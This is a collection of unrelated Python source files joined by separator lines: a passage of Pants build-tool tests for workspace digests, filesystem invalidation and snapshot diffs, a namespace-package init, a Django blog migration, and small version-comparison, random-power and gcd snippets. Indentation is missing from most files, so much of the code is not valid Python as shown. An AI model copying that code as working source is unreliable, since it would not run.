Digest, [CreateDigest([SymlinkEntry("newdir/d.txt", "newdir/a.txt")])]
)
all_paths = {name: Path(rule_runner.build_root, f"newdir/{name}.txt") for name in "abcd"}
def check(expected_names: set[str]) -> None:
for name, path in all_paths.items():
expected = name in expected_names
assert path.exists() == expected
workspace.write_digest(digest_a, clear_paths=())
workspace.write_digest(digest_b, clear_paths=())
check({"a", "b"})
# clear a file
workspace.write_digest(digest_d, clear_paths=("newdir/b.txt",))
check({"a", "d"})
# clear a symlink (doesn't remove target file)
workspace.write_digest(digest_b, clear_paths=("newdir/d.txt",))
check({"a", "b"})
# clear a directory
workspace.write_digest(digest_c, clear_paths=("newdir",))
check({"c"})
# path prefix, and clearing the 'current' directory
workspace.write_digest(digest_c_root, path_prefix="newdir", clear_paths=("",))
check({"c"})
# clear multiple paths
workspace.write_digest(digest_b, clear_paths=())
check({"b", "c"})
workspace.write_digest(digest_a, clear_paths=("newdir/b.txt", "newdir/c.txt"))
check({"a"})
# clearing non-existent paths is fine
workspace.write_digest(
digest_b, clear_paths=("not-here", "newdir/not-here", "not-here/also-not-here")
)
check({"a", "b"})
@dataclass(frozen=True)
class DigestRequest:
create_digest: CreateDigest
class WorkspaceGoalSubsystem(GoalSubsystem):
name = "workspace-goal"
class WorkspaceGoal(Goal):
subsystem_cls = WorkspaceGoalSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
def test_workspace_in_goal_rule() -> None:
@rule
def digest_request_singleton() -> DigestRequest:
fc = FileContent(path="a.txt", content=b"hello")
return DigestRequest(CreateDigest([fc]))
@goal_rule
async def workspace_goal_rule(
console: Console, workspace: Workspace, digest_request: DigestRequest
) -> WorkspaceGoal:
snapshot = await Get(Snapshot, CreateDigest, digest_request.create_digest)
workspace.write_digest(snapshot.digest)
console.print_stdout(snapshot.files[0], end="")
return WorkspaceGoal(exit_code=0)
rule_runner = RuleRunner(rules=[workspace_goal_rule, digest_request_singleton])
result = rule_runner.run_goal_rule(WorkspaceGoal)
assert result.exit_code == 0
assert result.stdout == "a.txt"
assert Path(rule_runner.build_root, "a.txt").read_text() == "hello"
# -----------------------------------------------------------------------------------------------
# Invalidation of the FS
# -----------------------------------------------------------------------------------------------
def test_invalidated_after_rewrite(rule_runner: RuleRunner) -> None:
"""Test that updating files causes invalidation of previous operations on those files."""
setup_fs_test_tar(rule_runner)
def read_file() -> str:
digest_contents = rule_runner.request(DigestContents, [PathGlobs(["4.txt"])])
assert len(digest_contents) == 1
return digest_contents[0].content.decode()
# First read the file, which should cache it.
assert read_file() == "four\n"
new_value = "cuatro\n"
Path(rule_runner.build_root, "4.txt").write_text(new_value)
assert try_with_backoff(lambda: read_file() == new_value)
def test_invalidated_after_parent_deletion(rule_runner: RuleRunner) -> None:
"""Test that FileContent is invalidated after deleting parent directory."""
setup_fs_test_tar(rule_runner)
def read_file() -> Optional[str]:
digest_contents = rule_runner.request(DigestContents, [PathGlobs(["a/b/1.txt"])])
if not digest_contents:
return None
assert len(digest_contents) == 1
return digest_contents[0].content.decode()
# Read the original file so that we have nodes to invalidate.
assert read_file() == "one\n"
shutil.rmtree(Path(rule_runner.build_root, "a/b"))
assert try_with_backoff((lambda: read_file() is None), count=10)
def test_invalidated_after_child_deletion(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
original_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
assert original_snapshot.files == ("a/3.txt", "a/4.txt.ln")
assert original_snapshot.dirs == ("a", "a/b")
Path(rule_runner.build_root, "a/3.txt").unlink()
def is_changed_snapshot() -> bool:
new_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
return (
new_snapshot.digest != original_snapshot.digest
and new_snapshot.files == ("a/4.txt.ln",)
and new_snapshot.dirs == ("a", "a/b")
)
assert try_with_backoff(is_changed_snapshot)
def test_invalidated_after_new_child(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
original_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
assert original_snapshot.files == ("a/3.txt", "a/4.txt.ln")
assert original_snapshot.dirs == ("a", "a/b")
Path(rule_runner.build_root, "a/new_file.txt").write_text("new file")
def is_changed_snapshot() -> bool:
new_snapshot = rule_runner.request(Snapshot, [PathGlobs(["a/*"])])
return (
new_snapshot.digest != original_snapshot.digest
and new_snapshot.files == ("a/3.txt", "a/4.txt.ln", "a/new_file.txt")
and new_snapshot.dirs == ("a", "a/b")
)
assert try_with_backoff(is_changed_snapshot)
# -----------------------------------------------------------------------------------------------
# Native types
# -----------------------------------------------------------------------------------------------
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_properties(digest_cls: type) -> None:
digest = digest_cls("a" * 64, 1000)
assert digest.fingerprint == "a" * 64
assert digest.serialized_bytes_length == 1000
@pytest.mark.parametrize("digest_cls,cls_name", ((Digest, "Digest"), (FileDigest, "FileDigest")))
def test_digest_repr(digest_cls: type, cls_name: str) -> None:
assert str(digest_cls("a" * 64, 1)) == f"{cls_name}({repr('a' * 64)}, 1)"
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_hash(digest_cls: type) -> None:
assert hash(digest_cls("a" * 64, 1)) == -6148914691236517206
assert hash(digest_cls("b" * 64, 1)) == -4919131752989213765
# Note that the size bytes is not considered in the hash.
assert hash(digest_cls("a" * 64, 1000)) == -6148914691236517206
@pytest.mark.parametrize("digest_cls", (Digest, FileDigest))
def test_digest_equality(digest_cls) -> None:
digest = digest_cls("a" * 64, 1)
assert digest == digest_cls("a" * 64, 1)
assert digest != digest_cls("a" * 64, 1000)
assert digest != digest_cls("0" * 64, 1)
with pytest.raises(TypeError):
digest < digest
def test_digest_is_not_file_digest() -> None:
assert Digest("a" * 64, 1) != FileDigest("a" * 64, 1)
def test_snapshot_properties() -> None:
snapshot = Snapshot.create_for_testing(["f.ext", "dir/f.ext"], ["dir"])
assert snapshot.digest is not None
assert snapshot.files == ("dir/f.ext", "f.ext")
assert snapshot.dirs == ("dir",)
def test_snapshot_hash_and_eq() -> None:
one = Snapshot.create_for_testing(["f.ext"], ["dir"])
two = Snapshot.create_for_testing(["f.ext"], ["dir"])
assert hash(one) == hash(two)
assert one == two
three = Snapshot.create_for_testing(["f.ext"], [])
assert hash(two) != hash(three)
assert two != three
@pytest.mark.parametrize(
"before, after, expected_diff",
[
({"pants.txt": "relaxed fit"}, {"pants.txt": "relaxed fit"}, SnapshotDiff()),
(
{"pants.txt": "relaxed fit"},
{"pants.txt": "slim fit"},
SnapshotDiff(
changed_files=("pants.txt",),
),
),
(
{
"levis/501.txt": "original",
"levis/jeans/511": "slim fit",
"wrangler/cowboy_cut.txt": "performance",
},
{},
SnapshotDiff(
our_unique_dirs=("levis", "wrangler"),
),
),
(
{
"levis/501.txt": "original",
"levis/jeans/511": "slim fit",
"levis/chinos/502": "taper fit",
"wrangler/cowboy_cut.txt": "performance",
},
{
"levis/501.txt": "slim",
"levis/jeans/511": "slim fit",
"wrangler/authentics.txt": "relaxed",
},
SnapshotDiff(
our_unique_dirs=("levis/chinos",),
our_unique_files=("wrangler/cowboy_cut.txt",),
their_unique_files=("wrangler/authentics.txt",),
changed_files=("levis/501.txt",),
),
),
# Same name, but one is a file and one is a dir
(
{"duluth/pants.txt": "5-Pocket"},
{"duluth": "DuluthFlex"},
SnapshotDiff(our_unique_dirs=("duluth",), their_unique_files=("duluth",)),
),
],
)
def test_snapshot_diff(
rule_runner: RuleRunner,
before: Dict[str, str],
after: Dict[str, str],
expected_diff: SnapshotDiff,
) -> None:
diff = SnapshotDiff.from_snapshots(
rule_runner.make_snapshot(before), rule_runner.make_snapshot(after)
)
assert diff.our_unique_files == expected_diff.our_unique_files
assert diff.our_unique_dirs == expected_diff.our_unique_dirs
assert diff.their_unique_files == expected_diff.their_unique_files
assert diff.their_unique_dirs == expected_diff.their_unique_dirs
assert diff.changed_files == expected_diff.changed_files
# test with the arguments reversed
diff = SnapshotDiff.from_snapshots(
rule_runner.make_snapshot(after), rule_runner.make_snapshot(before)
)
assert diff.our_unique_files == expected_diff.their_unique_files
assert diff.our_unique_dirs == expected_diff.their_unique_dirs
assert diff.their_unique_files == expected_diff.our_unique_files
assert diff.their_unique_dirs == expected_diff.our_unique_dirs
assert diff.changed_files == expected_diff.changed_files
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
# NB: Mark this as an explicit namespace package, so that `pants.testutil`
# can be loaded, if installed.
# (We can't rely on an implicit namespace package as pytest chooses package names based on the absence
# or presence of this file: https://docs.pytest.org/en/stable/explanation/goodpractices.html#test-package-name)
__path__ = __import__("pkgutil").extend_path(__path__, __name__)
|
# Generated by Django 2.2 on 2019-04-26 10:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogPost',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('slug', models.SlugField()),
('body', models.TextField()),
('date_created', models.DateTimeField(auto_now_add=True)),
('thumbnail', models.ImageField(blank=True, default='de.png', upload_to='')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-date_created'],
},
),
migrations.CreateModel(
name='BlogTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tagname', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('date_commented', models.DateTimeField(auto_now=True)),
('blog_post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
('commenter', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='blogpost',
name='blogtag',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='blog.BlogTag'),
),
]
|
#!/usr/bin/env python
import argparse
# define interface
def cml_interface():
parser = argparse.ArgumentParser(description='compare two strings representing versions')
parser.add_argument(dest='strings', type=str, nargs='+')
return parser.parse_args()
def compare_versions(s1, s2):
    # Compare component-wise as integers so that e.g. 1.10 > 1.9
    # (comparing the raw string components would wrongly report '10' < '9').
    l1 = [int(part) for part in s1.split('.')]
    l2 = [int(part) for part in s2.split('.')]
    for i, j in zip(l1, l2):
        if i == j:
            continue
        elif i < j:
            return '{} < {}'.format(s1, s2)
        else:
            return '{} > {}'.format(s1, s2)
    # All shared components match: the version with more components wins
    # (note this treats 1.2.0 as greater than 1.2).
    if len(l1) < len(l2):
        return '{} < {}'.format(s1, s2)
    elif len(l1) > len(l2):
        return '{} > {}'.format(s1, s2)
    return '{} = {}'.format(s1, s2)
if __name__ == '__main__':
args = cml_interface()
s1, s2 = args.strings
print(compare_versions(s1, s2))
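# Illustrative usage (added as comments only; the expected results follow
# from the numeric component comparison above):
#   compare_versions('1.10', '1.9')   -> '1.10 > 1.9'
#   compare_versions('2.0', '2.0.1')  -> '2.0 < 2.0.1'
#   compare_versions('3.4', '3.4')    -> '3.4 = 3.4'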
|
from random import randint
x = randint(1, 50)
print("Random first value :", x)
y = randint(2, 5)
print("Random second value :", y)
print("x power y :", x ** y)
|
def gcd_test_two(a, b):
    # Euclidean algorithm: swap so that a <= b, then recurse on (a, b % a)
    # until one value divides the other.
    if a > b:
        a, b = b, a
    if b % a == 0:
        return a
    else:
        return gcd_test_two(a, b % a)
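# Quick sanity checks (illustrative additions, not part of the original snippet):
if __name__ == '__main__':
    assert gcd_test_two(12, 18) == 6
    assert gcd_test_two(7, 13) == 1
    print(gcd_test_two(48, 180))  # prints 12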
|